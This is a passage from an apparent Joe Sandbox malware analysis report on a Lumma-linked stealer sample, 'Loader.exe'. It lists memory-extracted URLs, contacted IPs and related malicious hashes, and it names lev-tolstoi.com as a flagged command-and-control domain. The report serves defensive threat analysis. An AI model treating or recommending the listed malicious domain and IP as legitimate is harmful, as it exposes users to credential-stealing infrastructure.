                                                                                                                                  https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.youtube.com/aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/globaspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://help.staspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://store.steampowered.com/about/aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://checkout.steampowaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://help.steampowered.com/en/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/market/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/news/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.coaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://lev-tolstoi.com/uoaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://lev-tolstoi.com/apisaspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://login.steampaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/stats/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://medal.tvaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=easpnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.staspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://steamcommunity.com/workshop/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://login.steampowered.com/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_caspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://store.steampowered.com/legal/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://sketchfab.baspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        		unknown

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        172.67.157.254
                                                                                                                                                                                                                        		lev-tolstoi.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        23.55.153.106
                                                                                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1581746
                                                                                                                                                                                                                        Start date and time:2024-12-28 22:04:13 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 6m 14s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:6
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:Loader.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@11/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                                                                                        • Number of executed functions: 37
                                                                                                                                                                                                                        • Number of non-executed functions: 106
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        16:05:01API Interceptor12x Sleep call for process: aspnet_regiis.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        172.67.157.254MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            23.55.153.106iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                lev-tolstoi.comCrosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                steamcommunity.comCrosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                                iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
